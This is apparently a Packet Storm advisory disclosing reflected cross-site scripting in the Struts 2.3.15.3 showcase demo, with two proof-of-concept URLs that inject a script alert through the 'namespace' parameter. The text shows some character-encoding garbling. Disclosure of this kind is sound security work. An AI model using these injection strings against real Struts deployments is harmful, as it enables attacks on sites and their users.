Struts version 2.3.15.3 suffers from multiple cross site scripting vulnerabilities.
c6554f49acdc80a0d54e90157d4de1ee7f01933f3569c0eb965debf94761230d*Abstract£º*
The latest version of the current official
struts-2.3.15.3£¬struts2-showcase.war demo XSS still exist!
*Details£º*
I found an update of the official demo of Strust2, so I did a test. It used
to be able to filter, escape input and escape output, but why didn¡¯t it
escape this time?
*Proofs of concept£º*
Two demo addresses¡¯ namespacec parameters were not solved:
http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=
<script>alert(/xss/);</script>
http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=
<script>alert(/xss/);</script>&actionName=showcase
[image: ÄÚǶͼƬ 2][image: ÄÚǶͼƬ 3]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed